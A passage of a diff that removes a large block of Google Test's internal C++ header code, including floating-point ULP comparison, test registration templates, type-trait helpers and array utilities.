-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47, T48, T49, T50> > {
-  typedef typename Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47, T48, T49, T50>::type type;
-};
-
-#endif  // GTEST_HAS_TYPED_TEST || GTEST_HAS_TYPED_TEST_P
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TYPE_UTIL_H_
-
-// Due to C++ preprocessor weirdness, we need double indirection to
-// concatenate two tokens when one of them is __LINE__.  Writing
-//
-//   foo ## __LINE__
-//
-// will result in the token foo__LINE__, instead of foo followed by
-// the current line number.  For more details, see
-// http://www.parashift.com/c++-faq-lite/misc-technical-issues.html#faq-39.6
-#define GTEST_CONCAT_TOKEN_(foo, bar) GTEST_CONCAT_TOKEN_IMPL_(foo, bar)
-#define GTEST_CONCAT_TOKEN_IMPL_(foo, bar) foo ## bar
-
-class ProtocolMessage;
-namespace proto2 { class Message; }
-
-namespace testing {
-
-// Forward declarations.
-
-class AssertionResult;                 // Result of an assertion.
-class Message;                         // Represents a failure message.
-class Test;                            // Represents a test.
-class TestInfo;                        // Information about a test.
-class TestPartResult;                  // Result of a test part.
-class UnitTest;                        // A collection of test cases.
-
-template <typename T>
-::std::string PrintToString(const T& value);
-
-namespace internal {
-
-struct TraceInfo;                      // Information about a trace point.
-class ScopedTrace;                     // Implements scoped trace.
-class TestInfoImpl;                    // Opaque implementation of TestInfo
-class UnitTestImpl;                    // Opaque implementation of UnitTest
-
-// How many times InitGoogleTest() has been called.
-GTEST_API_ extern int g_init_gtest_count;
-
-// The text used in failure messages to indicate the start of the
-// stack trace.
-GTEST_API_ extern const char kStackTraceMarker[];
-
-// Two overloaded helpers for checking at compile time whether an
-// expression is a null pointer literal (i.e. NULL or any 0-valued
-// compile-time integral constant).  Their return values have
-// different sizes, so we can use sizeof() to test which version is
-// picked by the compiler.  These helpers have no implementations, as
-// we only need their signatures.
-//
-// Given IsNullLiteralHelper(x), the compiler will pick the first
-// version if x can be implicitly converted to Secret*, and pick the
-// second version otherwise.  Since Secret is a secret and incomplete
-// type, the only expression a user can write that has type Secret* is
-// a null pointer literal.  Therefore, we know that x is a null
-// pointer literal if and only if the first version is picked by the
-// compiler.
-char IsNullLiteralHelper(Secret* p);
-char (&IsNullLiteralHelper(...))[2];  // NOLINT
-
-// A compile-time bool constant that is true if and only if x is a
-// null pointer literal (i.e. NULL or any 0-valued compile-time
-// integral constant).
-#ifdef GTEST_ELLIPSIS_NEEDS_POD_
-// We lose support for NULL detection where the compiler doesn't like
-// passing non-POD classes through ellipsis (...).
-# define GTEST_IS_NULL_LITERAL_(x) false
-#else
-# define GTEST_IS_NULL_LITERAL_(x) \
-    (sizeof(::testing::internal::IsNullLiteralHelper(x)) == 1)
-#endif  // GTEST_ELLIPSIS_NEEDS_POD_
-
-// Appends the user-supplied message to the Google-Test-generated message.
-GTEST_API_ std::string AppendUserMessage(
-    const std::string& gtest_msg, const Message& user_msg);
-
-#if GTEST_HAS_EXCEPTIONS
-
-// This exception is thrown by (and only by) a failed Google Test
-// assertion when GTEST_FLAG(throw_on_failure) is true (if exceptions
-// are enabled).  We derive it from std::runtime_error, which is for
-// errors presumably detectable only at run time.  Since
-// std::runtime_error inherits from std::exception, many testing
-// frameworks know how to extract and print the message inside it.
-class GTEST_API_ GoogleTestFailureException : public ::std::runtime_error {
- public:
-  explicit GoogleTestFailureException(const TestPartResult& failure);
-};
-
-#endif  // GTEST_HAS_EXCEPTIONS
-
-// A helper class for creating scoped traces in user programs.
-class GTEST_API_ ScopedTrace {
- public:
-  // The c'tor pushes the given source file location and message onto
-  // a trace stack maintained by Google Test.
-  ScopedTrace(const char* file, int line, const Message& message);
-
-  // The d'tor pops the info pushed by the c'tor.
-  //
-  // Note that the d'tor is not virtual in order to be efficient.
-  // Don't inherit from ScopedTrace!
-  ~ScopedTrace();
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ScopedTrace);
-} GTEST_ATTRIBUTE_UNUSED_;  // A ScopedTrace object does its job in its
-                            // c'tor and d'tor.  Therefore it doesn't
-                            // need to be used otherwise.
-
-namespace edit_distance {
-// Returns the optimal edits to go from 'left' to 'right'.
-// All edits cost the same, with replace having lower priority than
-// add/remove.
-// Simple implementation of the Wagner-Fischer algorithm.
-// See http://en.wikipedia.org/wiki/Wagner-Fischer_algorithm
-enum EditType { kMatch, kAdd, kRemove, kReplace };
-GTEST_API_ std::vector<EditType> CalculateOptimalEdits(
-    const std::vector<size_t>& left, const std::vector<size_t>& right);
-
-// Same as above, but the input is represented as strings.
-GTEST_API_ std::vector<EditType> CalculateOptimalEdits(
-    const std::vector<std::string>& left,
-    const std::vector<std::string>& right);
-
-// Create a diff of the input strings in Unified diff format.
-GTEST_API_ std::string CreateUnifiedDiff(const std::vector<std::string>& left,
-                                         const std::vector<std::string>& right,
-                                         size_t context = 2);
-
-}  // namespace edit_distance
-
-// Calculate the diff between 'left' and 'right' and return it in unified diff
-// format.
-// If not null, stores in 'total_line_count' the total number of lines found
-// in left + right.
-GTEST_API_ std::string DiffStrings(const std::string& left,
-                                   const std::string& right,
-                                   size_t* total_line_count);
-
-// Constructs and returns the message for an equality assertion
-// (e.g. ASSERT_EQ, EXPECT_STREQ, etc) failure.
-//
-// The first four parameters are the expressions used in the assertion
-// and their values, as strings.  For example, for ASSERT_EQ(foo, bar)
-// where foo is 5 and bar is 6, we have:
-//
-//   expected_expression: "foo"
-//   actual_expression:   "bar"
-//   expected_value:      "5"
-//   actual_value:        "6"
-//
-// The ignoring_case parameter is true iff the assertion is a
-// *_STRCASEEQ*.  When it's true, the string " (ignoring case)" will
-// be inserted into the message.
-GTEST_API_ AssertionResult EqFailure(const char* expected_expression,
-                                     const char* actual_expression,
-                                     const std::string& expected_value,
-                                     const std::string& actual_value,
-                                     bool ignoring_case);
-
-// Constructs a failure message for Boolean assertions such as EXPECT_TRUE.
-GTEST_API_ std::string GetBoolAssertionFailureMessage(
-    const AssertionResult& assertion_result,
-    const char* expression_text,
-    const char* actual_predicate_value,
-    const char* expected_predicate_value);
-
-// This template class represents an IEEE floating-point number
-// (either single-precision or double-precision, depending on the
-// template parameters).
-//
-// The purpose of this class is to do more sophisticated number
-// comparison.  (Due to round-off error, etc, it's very unlikely that
-// two floating-points will be equal exactly.  Hence a naive
-// comparison by the == operation often doesn't work.)
-//
-// Format of IEEE floating-point:
-//
-//   The most-significant bit being the leftmost, an IEEE
-//   floating-point looks like
-//
-//     sign_bit exponent_bits fraction_bits
-//
-//   Here, sign_bit is a single bit that designates the sign of the
-//   number.
-//
-//   For float, there are 8 exponent bits and 23 fraction bits.
-//
-//   For double, there are 11 exponent bits and 52 fraction bits.
-//
-//   More details can be found at
-//   http://en.wikipedia.org/wiki/IEEE_floating-point_standard.
-//
-// Template parameter:
-//
-//   RawType: the raw floating-point type (either float or double)
-template <typename RawType>
-class FloatingPoint {
- public:
-  // Defines the unsigned integer type that has the same size as the
-  // floating point number.
-  typedef typename TypeWithSize<sizeof(RawType)>::UInt Bits;
-
-  // Constants.
-
-  // # of bits in a number.
-  static const size_t kBitCount = 8*sizeof(RawType);
-
-  // # of fraction bits in a number.
-  static const size_t kFractionBitCount =
-    std::numeric_limits<RawType>::digits - 1;
-
-  // # of exponent bits in a number.
-  static const size_t kExponentBitCount = kBitCount - 1 - kFractionBitCount;
-
-  // The mask for the sign bit.
-  static const Bits kSignBitMask = static_cast<Bits>(1) << (kBitCount - 1);
-
-  // The mask for the fraction bits.
-  static const Bits kFractionBitMask =
-    ~static_cast<Bits>(0) >> (kExponentBitCount + 1);
-
-  // The mask for the exponent bits.
-  static const Bits kExponentBitMask = ~(kSignBitMask | kFractionBitMask);
-
-  // How many ULP's (Units in the Last Place) we want to tolerate when
-  // comparing two numbers.  The larger the value, the more error we
-  // allow.  A 0 value means that two numbers must be exactly the same
-  // to be considered equal.
-  //
-  // The maximum error of a single floating-point operation is 0.5
-  // units in the last place.  On Intel CPU's, all floating-point
-  // calculations are done with 80-bit precision, while double has 64
-  // bits.  Therefore, 4 should be enough for ordinary use.
-  //
-  // See the following article for more details on ULP:
-  // http://randomascii.wordpress.com/2012/02/25/comparing-floating-point-numbers-2012-edition/
-  static const size_t kMaxUlps = 4;
-
-  // Constructs a FloatingPoint from a raw floating-point number.
-  //
-  // On an Intel CPU, passing a non-normalized NAN (Not a Number)
-  // around may change its bits, although the new value is guaranteed
-  // to be also a NAN.  Therefore, don't expect this constructor to
-  // preserve the bits in x when x is a NAN.
-  explicit FloatingPoint(const RawType& x) { u_.value_ = x; }
-
-  // Static methods
-
-  // Reinterprets a bit pattern as a floating-point number.
-  //
-  // This function is needed to test the AlmostEquals() method.
-  static RawType ReinterpretBits(const Bits bits) {
-    FloatingPoint fp(0);
-    fp.u_.bits_ = bits;
-    return fp.u_.value_;
-  }
-
-  // Returns the floating-point number that represent positive infinity.
-  static RawType Infinity() {
-    return ReinterpretBits(kExponentBitMask);
-  }
-
-  // Returns the maximum representable finite floating-point number.
-  static RawType Max();
-
-  // Non-static methods
-
-  // Returns the bits that represents this number.
-  const Bits &bits() const { return u_.bits_; }
-
-  // Returns the exponent bits of this number.
-  Bits exponent_bits() const { return kExponentBitMask & u_.bits_; }
-
-  // Returns the fraction bits of this number.
-  Bits fraction_bits() const { return kFractionBitMask & u_.bits_; }
-
-  // Returns the sign bit of this number.
-  Bits sign_bit() const { return kSignBitMask & u_.bits_; }
-
-  // Returns true iff this is NAN (not a number).
-  bool is_nan() const {
-    // It's a NAN if the exponent bits are all ones and the fraction
-    // bits are not entirely zeros.
-    return (exponent_bits() == kExponentBitMask) && (fraction_bits() != 0);
-  }
-
-  // Returns true iff this number is at most kMaxUlps ULP's away from
-  // rhs.  In particular, this function:
-  //
-  //   - returns false if either number is (or both are) NAN.
-  //   - treats really large numbers as almost equal to infinity.
-  //   - thinks +0.0 and -0.0 are 0 DLP's apart.
-  bool AlmostEquals(const FloatingPoint& rhs) const {
-    // The IEEE standard says that any comparison operation involving
-    // a NAN must return false.
-    if (is_nan() || rhs.is_nan()) return false;
-
-    return DistanceBetweenSignAndMagnitudeNumbers(u_.bits_, rhs.u_.bits_)
-        <= kMaxUlps;
-  }
-
- private:
-  // The data type used to store the actual floating-point number.
-  union FloatingPointUnion {
-    RawType value_;  // The raw floating-point number.
-    Bits bits_;      // The bits that represent the number.
-  };
-
-  // Converts an integer from the sign-and-magnitude representation to
-  // the biased representation.  More precisely, let N be 2 to the
-  // power of (kBitCount - 1), an integer x is represented by the
-  // unsigned number x + N.
-  //
-  // For instance,
-  //
-  //   -N + 1 (the most negative number representable using
-  //          sign-and-magnitude) is represented by 1;
-  //   0      is represented by N; and
-  //   N - 1  (the biggest number representable using
-  //          sign-and-magnitude) is represented by 2N - 1.
-  //
-  // Read http://en.wikipedia.org/wiki/Signed_number_representations
-  // for more details on signed number representations.
-  static Bits SignAndMagnitudeToBiased(const Bits &sam) {
-    if (kSignBitMask & sam) {
-      // sam represents a negative number.
-      return ~sam + 1;
-    } else {
-      // sam represents a positive number.
-      return kSignBitMask | sam;
-    }
-  }
-
-  // Given two numbers in the sign-and-magnitude representation,
-  // returns the distance between them as an unsigned number.
-  static Bits DistanceBetweenSignAndMagnitudeNumbers(const Bits &sam1,
-                                                     const Bits &sam2) {
-    const Bits biased1 = SignAndMagnitudeToBiased(sam1);
-    const Bits biased2 = SignAndMagnitudeToBiased(sam2);
-    return (biased1 >= biased2) ? (biased1 - biased2) : (biased2 - biased1);
-  }
-
-  FloatingPointUnion u_;
-};
-
-// We cannot use std::numeric_limits<T>::max() as it clashes with the max()
-// macro defined by <windows.h>.
-template <>
-inline float FloatingPoint<float>::Max() { return FLT_MAX; }
-template <>
-inline double FloatingPoint<double>::Max() { return DBL_MAX; }
-
-// Typedefs the instances of the FloatingPoint template class that we
-// care to use.
-typedef FloatingPoint<float> Float;
-typedef FloatingPoint<double> Double;
-
-// In order to catch the mistake of putting tests that use different
-// test fixture classes in the same test case, we need to assign
-// unique IDs to fixture classes and compare them.  The TypeId type is
-// used to hold such IDs.  The user should treat TypeId as an opaque
-// type: the only operation allowed on TypeId values is to compare
-// them for equality using the == operator.
-typedef const void* TypeId;
-
-template <typename T>
-class TypeIdHelper {
- public:
-  // dummy_ must not have a const type.  Otherwise an overly eager
-  // compiler (e.g. MSVC 7.1 & 8.0) may try to merge
-  // TypeIdHelper<T>::dummy_ for different Ts as an "optimization".
-  static bool dummy_;
-};
-
-template <typename T>
-bool TypeIdHelper<T>::dummy_ = false;
-
-// GetTypeId<T>() returns the ID of type T.  Different values will be
-// returned for different types.  Calling the function twice with the
-// same type argument is guaranteed to return the same ID.
-template <typename T>
-TypeId GetTypeId() {
-  // The compiler is required to allocate a different
-  // TypeIdHelper<T>::dummy_ variable for each T used to instantiate
-  // the template.  Therefore, the address of dummy_ is guaranteed to
-  // be unique.
-  return &(TypeIdHelper<T>::dummy_);
-}
-
-// Returns the type ID of ::testing::Test.  Always call this instead
-// of GetTypeId< ::testing::Test>() to get the type ID of
-// ::testing::Test, as the latter may give the wrong result due to a
-// suspected linker bug when compiling Google Test as a Mac OS X
-// framework.
-GTEST_API_ TypeId GetTestTypeId();
-
-// Defines the abstract factory interface that creates instances
-// of a Test object.
-class TestFactoryBase {
- public:
-  virtual ~TestFactoryBase() {}
-
-  // Creates a test instance to run. The instance is both created and destroyed
-  // within TestInfoImpl::Run()
-  virtual Test* CreateTest() = 0;
-
- protected:
-  TestFactoryBase() {}
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestFactoryBase);
-};
-
-// This class provides implementation of TeastFactoryBase interface.
-// It is used in TEST and TEST_F macros.
-template <class TestClass>
-class TestFactoryImpl : public TestFactoryBase {
- public:
-  virtual Test* CreateTest() { return new TestClass; }
-};
-
-#if GTEST_OS_WINDOWS
-
-// Predicate-formatters for implementing the HRESULT checking macros
-// {ASSERT|EXPECT}_HRESULT_{SUCCEEDED|FAILED}
-// We pass a long instead of HRESULT to avoid causing an
-// include dependency for the HRESULT type.
-GTEST_API_ AssertionResult IsHRESULTSuccess(const char* expr,
-                                            long hr);  // NOLINT
-GTEST_API_ AssertionResult IsHRESULTFailure(const char* expr,
-                                            long hr);  // NOLINT
-
-#endif  // GTEST_OS_WINDOWS
-
-// Types of SetUpTestCase() and TearDownTestCase() functions.
-typedef void (*SetUpTestCaseFunc)();
-typedef void (*TearDownTestCaseFunc)();
-
-// Creates a new TestInfo object and registers it with Google Test;
-// returns the created object.
-//
-// Arguments:
-//
-//   test_case_name:   name of the test case
-//   name:             name of the test
-//   type_param        the name of the test's type parameter, or NULL if
-//                     this is not a typed or a type-parameterized test.
-//   value_param       text representation of the test's value parameter,
-//                     or NULL if this is not a type-parameterized test.
-//   fixture_class_id: ID of the test fixture class
-//   set_up_tc:        pointer to the function that sets up the test case
-//   tear_down_tc:     pointer to the function that tears down the test case
-//   factory:          pointer to the factory that creates a test object.
-//                     The newly created TestInfo instance will assume
-//                     ownership of the factory object.
-GTEST_API_ TestInfo* MakeAndRegisterTestInfo(
-    const char* test_case_name,
-    const char* name,
-    const char* type_param,
-    const char* value_param,
-    TypeId fixture_class_id,
-    SetUpTestCaseFunc set_up_tc,
-    TearDownTestCaseFunc tear_down_tc,
-    TestFactoryBase* factory);
-
-// If *pstr starts with the given prefix, modifies *pstr to be right
-// past the prefix and returns true; otherwise leaves *pstr unchanged
-// and returns false.  None of pstr, *pstr, and prefix can be NULL.
-GTEST_API_ bool SkipPrefix(const char* prefix, const char** pstr);
-
-#if GTEST_HAS_TYPED_TEST || GTEST_HAS_TYPED_TEST_P
-
-// State of the definition of a type-parameterized test case.
-class GTEST_API_ TypedTestCasePState {
- public:
-  TypedTestCasePState() : registered_(false) {}
-
-  // Adds the given test name to defined_test_names_ and return true
-  // if the test case hasn't been registered; otherwise aborts the
-  // program.
-  bool AddTestName(const char* file, int line, const char* case_name,
-                   const char* test_name) {
-    if (registered_) {
-      fprintf(stderr, "%s Test %s must be defined before "
-              "REGISTER_TYPED_TEST_CASE_P(%s, ...).\n",
-              FormatFileLocation(file, line).c_str(), test_name, case_name);
-      fflush(stderr);
-      posix::Abort();
-    }
-    defined_test_names_.insert(test_name);
-    return true;
-  }
-
-  // Verifies that registered_tests match the test names in
-  // defined_test_names_; returns registered_tests if successful, or
-  // aborts the program otherwise.
-  const char* VerifyRegisteredTestNames(
-      const char* file, int line, const char* registered_tests);
-
- private:
-  bool registered_;
-  ::std::set<const char*> defined_test_names_;
-};
-
-// Skips to the first non-space char after the first comma in 'str';
-// returns NULL if no comma is found in 'str'.
-inline const char* SkipComma(const char* str) {
-  const char* comma = strchr(str, ',');
-  if (comma == NULL) {
-    return NULL;
-  }
-  while (IsSpace(*(++comma))) {}
-  return comma;
-}
-
-// Returns the prefix of 'str' before the first comma in it; returns
-// the entire string if it contains no comma.
-inline std::string GetPrefixUntilComma(const char* str) {
-  const char* comma = strchr(str, ',');
-  return comma == NULL ? str : std::string(str, comma);
-}
-
-// TypeParameterizedTest<Fixture, TestSel, Types>::Register()
-// registers a list of type-parameterized tests with Google Test.  The
-// return value is insignificant - we just need to return something
-// such that we can call this function in a namespace scope.
-//
-// Implementation note: The GTEST_TEMPLATE_ macro declares a template
-// template parameter.  It's defined in gtest-type-util.h.
-template <GTEST_TEMPLATE_ Fixture, class TestSel, typename Types>
-class TypeParameterizedTest {
- public:
-  // 'index' is the index of the test in the type list 'Types'
-  // specified in INSTANTIATE_TYPED_TEST_CASE_P(Prefix, TestCase,
-  // Types).  Valid values for 'index' are [0, N - 1] where N is the
-  // length of Types.
-  static bool Register(const char* prefix, const char* case_name,
-                       const char* test_names, int index) {
-    typedef typename Types::Head Type;
-    typedef Fixture<Type> FixtureClass;
-    typedef typename GTEST_BIND_(TestSel, Type) TestClass;
-
-    // First, registers the first type-parameterized test in the type
-    // list.
-    MakeAndRegisterTestInfo(
-        (std::string(prefix) + (prefix[0] == '\0' ? "" : "/") + case_name + "/"
-         + StreamableToString(index)).c_str(),
-        StripTrailingSpaces(GetPrefixUntilComma(test_names)).c_str(),
-        GetTypeName<Type>().c_str(),
-        NULL,  // No value parameter.
-        GetTypeId<FixtureClass>(),
-        TestClass::SetUpTestCase,
-        TestClass::TearDownTestCase,
-        new TestFactoryImpl<TestClass>);
-
-    // Next, recurses (at compile time) with the tail of the type list.
-    return TypeParameterizedTest<Fixture, TestSel, typename Types::Tail>
-        ::Register(prefix, case_name, test_names, index + 1);
-  }
-};
-
-// The base case for the compile time recursion.
-template <GTEST_TEMPLATE_ Fixture, class TestSel>
-class TypeParameterizedTest<Fixture, TestSel, Types0> {
- public:
-  static bool Register(const char* /*prefix*/, const char* /*case_name*/,
-                       const char* /*test_names*/, int /*index*/) {
-    return true;
-  }
-};
-
-// TypeParameterizedTestCase<Fixture, Tests, Types>::Register()
-// registers *all combinations* of 'Tests' and 'Types' with Google
-// Test.  The return value is insignificant - we just need to return
-// something such that we can call this function in a namespace scope.
-template <GTEST_TEMPLATE_ Fixture, typename Tests, typename Types>
-class TypeParameterizedTestCase {
- public:
-  static bool Register(const char* prefix, const char* case_name,
-                       const char* test_names) {
-    typedef typename Tests::Head Head;
-
-    // First, register the first test in 'Test' for each type in 'Types'.
-    TypeParameterizedTest<Fixture, Head, Types>::Register(
-        prefix, case_name, test_names, 0);
-
-    // Next, recurses (at compile time) with the tail of the test list.
-    return TypeParameterizedTestCase<Fixture, typename Tests::Tail, Types>
-        ::Register(prefix, case_name, SkipComma(test_names));
-  }
-};
-
-// The base case for the compile time recursion.
-template <GTEST_TEMPLATE_ Fixture, typename Types>
-class TypeParameterizedTestCase<Fixture, Templates0, Types> {
- public:
-  static bool Register(const char* /*prefix*/, const char* /*case_name*/,
-                       const char* /*test_names*/) {
-    return true;
-  }
-};
-
-#endif  // GTEST_HAS_TYPED_TEST || GTEST_HAS_TYPED_TEST_P
-
-// Returns the current OS stack trace as an std::string.
-//
-// The maximum number of stack frames to be included is specified by
-// the gtest_stack_trace_depth flag.  The skip_count parameter
-// specifies the number of top frames to be skipped, which doesn't
-// count against the number of frames to be included.
-//
-// For example, if Foo() calls Bar(), which in turn calls
-// GetCurrentOsStackTraceExceptTop(..., 1), Foo() will be included in
-// the trace but Bar() and GetCurrentOsStackTraceExceptTop() won't.
-GTEST_API_ std::string GetCurrentOsStackTraceExceptTop(
-    UnitTest* unit_test, int skip_count);
-
-// Helpers for suppressing warnings on unreachable code or constant
-// condition.
-
-// Always returns true.
-GTEST_API_ bool AlwaysTrue();
-
-// Always returns false.
-inline bool AlwaysFalse() { return !AlwaysTrue(); }
-
-// Helper for suppressing false warning from Clang on a const char*
-// variable declared in a conditional expression always being NULL in
-// the else branch.
-struct GTEST_API_ ConstCharPtr {
-  ConstCharPtr(const char* str) : value(str) {}
-  operator bool() const { return true; }
-  const char* value;
-};
-
-// A simple Linear Congruential Generator for generating random
-// numbers with a uniform distribution.  Unlike rand() and srand(), it
-// doesn't use global state (and therefore can't interfere with user
-// code).  Unlike rand_r(), it's portable.  An LCG isn't very random,
-// but it's good enough for our purposes.
-class GTEST_API_ Random {
- public:
-  static const UInt32 kMaxRange = 1u << 31;
-
-  explicit Random(UInt32 seed) : state_(seed) {}
-
-  void Reseed(UInt32 seed) { state_ = seed; }
-
-  // Generates a random number from [0, range).  Crashes if 'range' is
-  // 0 or greater than kMaxRange.
-  UInt32 Generate(UInt32 range);
-
- private:
-  UInt32 state_;
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Random);
-};
-
-// Defining a variable of type CompileAssertTypesEqual<T1, T2> will cause a
-// compiler error iff T1 and T2 are different types.
-template <typename T1, typename T2>
-struct CompileAssertTypesEqual;
-
-template <typename T>
-struct CompileAssertTypesEqual<T, T> {
-};
-
-// Removes the reference from a type if it is a reference type,
-// otherwise leaves it unchanged.  This is the same as
-// tr1::remove_reference, which is not widely available yet.
-template <typename T>
-struct RemoveReference { typedef T type; };  // NOLINT
-template <typename T>
-struct RemoveReference<T&> { typedef T type; };  // NOLINT
-
-// A handy wrapper around RemoveReference that works when the argument
-// T depends on template parameters.
-#define GTEST_REMOVE_REFERENCE_(T) \
-    typename ::testing::internal::RemoveReference<T>::type
-
-// Removes const from a type if it is a const type, otherwise leaves
-// it unchanged.  This is the same as tr1::remove_const, which is not
-// widely available yet.
-template <typename T>
-struct RemoveConst { typedef T type; };  // NOLINT
-template <typename T>
-struct RemoveConst<const T> { typedef T type; };  // NOLINT
-
-// MSVC 8.0, Sun C++, and IBM XL C++ have a bug which causes the above
-// definition to fail to remove the const in 'const int[3]' and 'const
-// char[3][4]'.  The following specialization works around the bug.
-template <typename T, size_t N>
-struct RemoveConst<const T[N]> {
-  typedef typename RemoveConst<T>::type type[N];
-};
-
-#if defined(_MSC_VER) && _MSC_VER < 1400
-// This is the only specialization that allows VC++ 7.1 to remove const in
-// 'const int[3] and 'const int[3][4]'.  However, it causes trouble with GCC
-// and thus needs to be conditionally compiled.
-template <typename T, size_t N>
-struct RemoveConst<T[N]> {
-  typedef typename RemoveConst<T>::type type[N];
-};
-#endif
-
-// A handy wrapper around RemoveConst that works when the argument
-// T depends on template parameters.
-#define GTEST_REMOVE_CONST_(T) \
-    typename ::testing::internal::RemoveConst<T>::type
-
-// Turns const U&, U&, const U, and U all into U.
-#define GTEST_REMOVE_REFERENCE_AND_CONST_(T) \
-    GTEST_REMOVE_CONST_(GTEST_REMOVE_REFERENCE_(T))
-
-// Adds reference to a type if it is not a reference type,
-// otherwise leaves it unchanged.  This is the same as
-// tr1::add_reference, which is not widely available yet.
-template <typename T>
-struct AddReference { typedef T& type; };  // NOLINT
-template <typename T>
-struct AddReference<T&> { typedef T& type; };  // NOLINT
-
-// A handy wrapper around AddReference that works when the argument T
-// depends on template parameters.
-#define GTEST_ADD_REFERENCE_(T) \
-    typename ::testing::internal::AddReference<T>::type
-
-// Adds a reference to const on top of T as necessary.  For example,
-// it transforms
-//
-//   char         ==> const char&
-//   const char   ==> const char&
-//   char&        ==> const char&
-//   const char&  ==> const char&
-//
-// The argument T must depend on some template parameters.
-#define GTEST_REFERENCE_TO_CONST_(T) \
-    GTEST_ADD_REFERENCE_(const GTEST_REMOVE_REFERENCE_(T))
-
-// ImplicitlyConvertible<From, To>::value is a compile-time bool
-// constant that's true iff type From can be implicitly converted to
-// type To.
-template <typename From, typename To>
-class ImplicitlyConvertible {
- private:
-  // We need the following helper functions only for their types.
-  // They have no implementations.
-
-  // MakeFrom() is an expression whose type is From.  We cannot simply
-  // use From(), as the type From may not have a public default
-  // constructor.
-  static typename AddReference<From>::type MakeFrom();
-
-  // These two functions are overloaded.  Given an expression
-  // Helper(x), the compiler will pick the first version if x can be
-  // implicitly converted to type To; otherwise it will pick the
-  // second version.
-  //
-  // The first version returns a value of size 1, and the second
-  // version returns a value of size 2.  Therefore, by checking the
-  // size of Helper(x), which can be done at compile time, we can tell
-  // which version of Helper() is used, and hence whether x can be
-  // implicitly converted to type To.
-  static char Helper(To);
-  static char (&Helper(...))[2];  // NOLINT
-
-  // We have to put the 'public' section after the 'private' section,
-  // or MSVC refuses to compile the code.
- public:
-#if defined(__BORLANDC__)
-  // C++Builder cannot use member overload resolution during template
-  // instantiation.  The simplest workaround is to use its C++0x type traits
-  // functions (C++Builder 2009 and above only).
-  static const bool value = __is_convertible(From, To);
-#else
-  // MSVC warns about implicitly converting from double to int for
-  // possible loss of data, so we need to temporarily disable the
-  // warning.
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4244)
-  static const bool value =
-      sizeof(Helper(ImplicitlyConvertible::MakeFrom())) == 1;
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-#endif  // __BORLANDC__
-};
-template <typename From, typename To>
-const bool ImplicitlyConvertible<From, To>::value;
-
-// IsAProtocolMessage<T>::value is a compile-time bool constant that's
-// true iff T is type ProtocolMessage, proto2::Message, or a subclass
-// of those.
-template <typename T>
-struct IsAProtocolMessage
-    : public bool_constant<
-  ImplicitlyConvertible<const T*, const ::ProtocolMessage*>::value ||
-  ImplicitlyConvertible<const T*, const ::proto2::Message*>::value> {
-};
-
-// When the compiler sees expression IsContainerTest<C>(0), if C is an
-// STL-style container class, the first overload of IsContainerTest
-// will be viable (since both C::iterator* and C::const_iterator* are
-// valid types and NULL can be implicitly converted to them).  It will
-// be picked over the second overload as 'int' is a perfect match for
-// the type of argument 0.  If C::iterator or C::const_iterator is not
-// a valid type, the first overload is not viable, and the second
-// overload will be picked.  Therefore, we can determine whether C is
-// a container class by checking the type of IsContainerTest<C>(0).
-// The value of the expression is insignificant.
-//
-// Note that we look for both C::iterator and C::const_iterator.  The
-// reason is that C++ injects the name of a class as a member of the
-// class itself (e.g. you can refer to class iterator as either
-// 'iterator' or 'iterator::iterator').  If we look for C::iterator
-// only, for example, we would mistakenly think that a class named
-// iterator is an STL container.
-//
-// Also note that the simpler approach of overloading
-// IsContainerTest(typename C::const_iterator*) and
-// IsContainerTest(...) doesn't work with Visual Age C++ and Sun C++.
-typedef int IsContainer;
-template <class C>
-IsContainer IsContainerTest(int /* dummy */,
-                            typename C::iterator* /* it */ = NULL,
-                            typename C::const_iterator* /* const_it */ = NULL) {
-  return 0;
-}
-
-typedef char IsNotContainer;
-template <class C>
-IsNotContainer IsContainerTest(long /* dummy */) { return '\0'; }
-
-// EnableIf<condition>::type is void when 'Cond' is true, and
-// undefined when 'Cond' is false.  To use SFINAE to make a function
-// overload only apply when a particular expression is true, add
-// "typename EnableIf<expression>::type* = 0" as the last parameter.
-template<bool> struct EnableIf;
-template<> struct EnableIf<true> { typedef void type; };  // NOLINT
-
-// Utilities for native arrays.
-
-// ArrayEq() compares two k-dimensional native arrays using the
-// elements' operator==, where k can be any integer >= 0.  When k is
-// 0, ArrayEq() degenerates into comparing a single pair of values.
-
-template <typename T, typename U>
-bool ArrayEq(const T* lhs, size_t size, const U* rhs);
-
-// This generic version is used when k is 0.
-template <typename T, typename U>
-inline bool ArrayEq(const T& lhs, const U& rhs) { return lhs == rhs; }
-
-// This overload is used when k >= 1.
-template <typename T, typename U, size_t N>
-inline bool ArrayEq(const T(&lhs)[N], const U(&rhs)[N]) {
-  return internal::ArrayEq(lhs, N, rhs);
-}
-
-// This helper reduces code bloat.  If we instead put its logic inside
-// the previous ArrayEq() function, arrays with different sizes would
-// lead to different copies of the template code.
-template <typename T, typename U>
-bool ArrayEq(const T* lhs, size_t size, const U* rhs) {
-  for (size_t i = 0; i != size; i++) {
-    if (!internal::ArrayEq(lhs[i], rhs[i]))
-      return false;
-  }
-  return true;
-}
-
-// Finds the first element in the iterator range [begin, end) that
-// equals elem.  Element may be a native array type itself.
-template <typename Iter, typename Element>
-Iter ArrayAwareFind(Iter begin, Iter end, const Element& elem) {
-  for (Iter it = begin; it != end; ++it) {
-    if (internal::ArrayEq(*it, elem))
-      return it;
-  }
-  return end;
-}
-
-// CopyArray() copies a k-dimensional native array using the elements'
-// operator=, where k can be any integer >= 0.  When k is 0,
-// CopyArray() degenerates into copying a single value.
-
-template <typename T, typename U>
-void CopyArray(const T* from, size_t size, U* to);
-
-// This generic version is used when k is 0.
-template <typename T, typename U>
-inline void CopyArray(const T& from, U* to) { *to = from; }
-
-// This overload is used when k >= 1.
-template <typename T, typename U, size_t N>
-inline void CopyArray(const T(&from)[N], U(*to)[N]) {
